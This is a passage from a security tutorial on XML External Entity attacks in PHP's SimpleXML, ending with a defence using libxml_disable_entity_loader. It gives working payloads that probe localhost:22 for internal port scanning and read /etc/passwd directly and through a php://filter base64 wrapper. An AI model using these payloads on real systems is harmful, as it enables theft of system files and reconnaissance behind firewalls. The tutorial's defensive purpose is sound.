XML is widely used throughout PHP applications in the representation arbitrary data structures such as with SOAP and REST web services. It supports the use of external entities allowing you to bring in information from external sources. This is useful when you want to create common references that are shared between XML documents - when you update the external source it becomes updated in all the XML documents. For example when we update the file copyright.xml it automatically gets dragged into the XML document below.
<?xml version="1.0" standalone="no" ?> <!DOCTYPE copyright [ <!ELEMENT copyright (#PCDATA)> <!ENTITY c SYSTEM "http://www.xmlwriter.net/copyright.xml"> ]> <copyright>&c;</copyright>
SimpleXML lets us bring any URL - for example http://www.example.com/blahblahblah.xml - into the document. The problem is that if the external entity isn't a valid XML endpoint it wont get parsed and PHP will throw an error like this.
Warning: simplexml_load_string(): php_network_getaddresses: getaddrinfo failed: Name or service not known in xml.php on line 5 Warning: simplexml_load_string(http://www.example.com/blahblahblah.xml): failed to open stream: php_network_getaddresses: getaddrinfo failed: Name or service not known in xml.php on line 5
Security issues arise because PHP places no restrictions on what URLs can be accessed; any URL that the parser can access can be included in the XML as a external entity. Even if allow_url_fopen is set to false it is still possible to include these files. Furthermore it is possible to specify ports to which the XML parser will connect, here we connect to localhost on port 22
<!DOCTYPE scan [<!ENTITY test SYSTEM "http://localhost:22">]> <scan>&test;</scan>
As long as PHP error messages are enabled you get back the banner of the service running even if the port doesn't support the HTTP protocol.
Warning: simplexml_load_string(http://localhost:22): failed to open stream: HTTP request failed! SSH-2.0-OpenSSH_5.5p1 Debian-4ubuntu5 in testxml.php on line 10
If error messages are suppressed it is still possible to work out if a service is running on the port by comparing the time taken to connect to a known open port (such as localhost:80) to known closed port. Using this technique its possible to scan the networks attached to the XML parser endpoint for services that otherwise might be blocked to the outside world by a firewall.
XML for Arbitrary File Disclosure
Turns out not only can you include remote URL you can also include local files (a.k.a Arbitrary File Disclosure) by using the file:// prefix (thanks to Am for pointing this out) e.g.
<!DOCTYPE scan [<!ENTITY test SYSTEM "file:///etc/passwd">]> <scan>&test;</scan>
If the result is echoed back to the end user it will contain a copy of /etc/passwd - The caveat is that the local file must be valid XML, this means that you cant include binary files - however, using PHP filters its possible to encode binary files as a Base64 encoded string e.g.
<!DOCTYPE scan [<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">]> <scan>&test;</scan>
This means that any PHP system parsing XML is potentially vulnerable to Local and Remote File disclosure attacks.
Defending against XML External Entity attacks
There doesn't appear to be a PHP configuration setting to disable the external entity feature however by issuing the command libxml_disable_entity_loader before the XML is parsed it is possible to turn external entities off at run time and protect yourself from this threat e.g.